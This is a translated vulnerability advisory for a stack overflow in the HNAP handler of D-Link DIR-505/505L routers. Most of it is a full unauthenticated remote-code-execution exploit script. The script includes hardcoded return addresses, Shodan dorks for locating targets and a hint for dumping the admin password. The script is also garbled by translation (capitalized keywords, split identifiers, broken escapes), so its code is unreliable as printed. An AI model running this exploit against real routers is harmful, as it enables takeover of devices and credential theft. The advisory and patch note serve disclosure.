DIR-505 and DIR-505L Stack Buffer Overflow Vulnerability

Release date:
Updated on:

Affected Systems:
D-Link DIR-505
D-Link DIR-505L
Description:
--------------------------------------------------------------------------------
Bugtraq id: 67651
 
Dlink focuses on the design and development of wireless networks and Ethernet hardware products.
 
DIR-505 and DIR-505L wireless routers have stack buffer overflow vulnerability, when processing the "Content-Length" packet header, "do_hnap ()" function (/www/my_cgi.cgi) has a boundary error, this vulnerability allows remote attackers to exploit this vulnerability to cause stack buffer overflow through specially crafted SOAP "GetDeviceSettings" HNAP requests.
 
<* Source: Craig

Link: http://secunia.com/advisories/58972/
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Craig () provides the following test methods:
========================================================== ==============
#! /Usr/bin/env python
# Unauthenticated stack overflow exploit that affects multiple D-Link products:
#
# O D-Link DSP-W215 hardware v1, firmware v1.00
# O D-Link DIR-505L hardware v1/2, firmware v1.06/1.07
#
# Shodan Dorks:
#
# O lighttpd/1.4.28-devel-4618M
# O lighttpd/1.4.28-devel-2866M
#
# The my_cgi.cgi CGI page responsible for handling HNAP requests reads
# Content-Length bytes into a fixed-size stack buffer.
#
# This exploit returns to. text to execute system () with a user-supplied
# Command string (hint: try 'nvram get admin_user_pwd '). Output from
# Command will be returned to the user.
#
# Craig Heffner
#2014-05-09

Import sys
Import urllib2

Class Device (object ):

Def _ init _ (self, model, version, size, ra ):
Self. model = model
Self. version = version
Self. size = size
Self. ra = ra

Self. model_html = "<ModelName> % s" % self. model
Self. version_html = "<FirmwareVersion> % s" % self. version

Def match (self, html ):
Return (self. model_html in html and self. version_html in html)

Class Vulnerability (object ):

DEFAULT_COMMAND = 'nvram show'

VULNERABLE_DEVICES = [
Device ("DIR-505", "1.06", 30000, "\ x00 \ x40 \ x52 \ x34 "),
Device ("DIR-505", "1.07", 30000, "\ x00 \ x40 \ x5C \ x5C "),
Device ("DSP-W215", "1.00", 1000000, "\ x00 \ x40 \ x5C \ xAC "),
]

Def _ init _ (self, target, verbose = True ):
Self. verbose = verbose
Self.tar get = target
Self. url = "% s/HNAP1/" % self.tar get
If ': //' not in self. url:
Self. url = 'HTTP: // '+ self. url
Self. _ debug_message ("Exploit URL: % s" % self. url)

Def _ debug_message (self, msg ):
If self. verbose:
Print "[+] % s" % msg

Def _ debug_error (self, err ):
If self. verbose:
Print "[-] % s" % err

Def _ build_exploit (self, device, command ):
# Return to. text section to execute system () with an arbitrary command string
Buf = "D" * device. size # Fill up the stack buffer
Buf + = "B" * 4 # $ s0, don't care
Buf + = "B" * 4 # $ s1, don't care
Buf + = "B" * 4 # $ s2, don't care
Buf + = "B" * 4 # $ s3, don't care
Buf + = "B" * 4 # $ s4, don't care
Buf + = device. ra # $ ra
Buf + = "C" * 0x28 # Stack filler
Buf + = command # Command to execute
Buf + = "\ x00" # NULL-terminate the command
Return buf

Def _ request (self, data = None ):
Req = urllib2.Request (self. url, data)
Try:
Data = urllib2.urlopen (req). read ()
Failed t urllib2.HTTPError as e:
Data = ""

If e. code = 500:
Self. _ debug_message ("CGI page crashed with no output (this may or may not be a good thing )! ")
Else:
Self. _ debug_error ("Unexpected response: % s" % (str (e )))

Return data

Def fingerprint (self ):
Hnap_info = self. _ request ()

For device in self. VULNERABLE_DEVICES:
If device. match (hnap_info ):
Self. _ debug_message ("Identified target as % s v % s" % (device. model, device. version ))
Return device

Self. _ debug_error ("cocould not identify target! ")
Return None

Def execute (self, device, command = DEFAULT_COMMAND ):
Self. _ debug_message ("Executing exploit [% s] against % s [% s v % s]" % (command, self.tar get, device. model, device. version ))
Return self. _ request (self. _ build_exploit (device, command ))

Def exploit (self, command = DEFAULT_COMMAND ):
Device = self. fingerprint ()
If device:
Return self.exe cute (device, command)
Else:
Return ""

If _ name _ = "_ main __":
If len (sys. argv )! = 3:
Print "Usage: % s <target ip> <command to execute>" % sys. argv [0]
Sys. exit (1)

Target = sys. argv [1]
Command = sys. argv [2]

Print "\ n" + Vulnerability (target). exploit (command)

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
 
D-Link
------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
 
Http://securityadvisories.dlink.com/security/publication.aspx? Name = SAP10029

This article permanently updates the link address: